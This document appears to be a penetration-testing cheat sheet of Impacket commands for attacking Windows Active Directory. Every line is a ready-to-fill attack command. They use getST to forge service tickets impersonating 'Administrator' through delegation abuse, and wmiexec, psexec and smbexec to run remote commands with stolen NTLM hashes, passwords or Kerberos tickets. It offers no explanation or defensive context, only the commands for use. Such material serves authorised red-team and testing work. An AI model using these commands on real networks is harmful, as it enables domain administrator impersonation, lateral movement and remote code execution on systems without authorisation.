# Use Hashes
getST -hashes :<Hash> -spn "cifs/<Machine Name>" -impersonate "Administrator" <Domain>/<UserName>
getST -hashes :<Hash> -spn "cifs/<Machine Name>" -impersonate "Administrator" <Domain>/<UserName> -force-forwardable -dc-ip <IP>
# Use UserName:Password
getST -spn "cifs/<Machine Name>" -impersonate "Administrator" <Domain>/<UserName>:<Password>
getST -spn "cifs/<Machine Name>" -impersonate "Administrator" <Domain>/<UserName>:<Password> -force-forwardable -dc-ip <IP>
# Without DNS
# Use Hashes
wmiexec -hashes :<Hash> <Domain>/<UserName>@<Machine Name> -codec gbk -target-ip <IP> <command>
psexec -hashes :<Hash> <Domain>/<UserName>@<Machine Name> -codec gbk -target-ip <IP> <command>
smbexec -hashes :<Hash> <Domain>/<UserName>@<Machine Name> -codec gbk -target-ip <IP>
# Use UserName:Password
wmiexec <Domain>/<UserName>:<Password>@<Machine Name> -codec gbk -target-ip <IP> <command>
psexec <Domain>/<UserName>:<Password>@<Machine Name> -codec gbk -target-ip <IP> <command>
smbexec <Domain>/<UserName>:<Password>@<Machine Name> -codec gbk -target-ip <IP>
# -k -no-pass / -debug
wmiexec -k -no-pass <Domain>/<UserName>@<Machine Name> -codec gbk -target-ip <IP> <command>
psexec -k -no-pass <Domain>/<UserName>@<Machine Name> -codec gbk -target-ip <IP> <command>
smbexec -k -no-pass <Domain>/<UserName>@<Machine Name> -codec gbk -target-ip <IP>
# Without DNS
# Use Hashes
Impacket-wmiexec -hashes :<NTLM_HASH> '<Domain>/<UserName>@<Machine Name>' -codec gbk -target-ip <IP> <command>
Impacket-psexec -hashes :<NTLM_HASH> '<Domain>/<UserName>@<Machine Name>' -codec gbk -target-ip <IP> <command>
Impacket-smbexec -hashes :<NTLM_HASH> '<Domain>/<UserName>@<Machine Name>' -codec gbk -target-ip <IP>
# Use UserName:Password
Impacket-wmiexec '<Domain>/<UserName>:<Password>@<Machine Name>' -codec gbk -target-ip <IP> <command>
Impacket-psexec '<Domain>/<UserName>:<Password>@<Machine Name>' -codec gbk -target-ip <IP> <command>
Impacket-smbexec '<Domain>/<UserName>:<Password>@<Machine Name>' -codec gbk -target-ip <IP>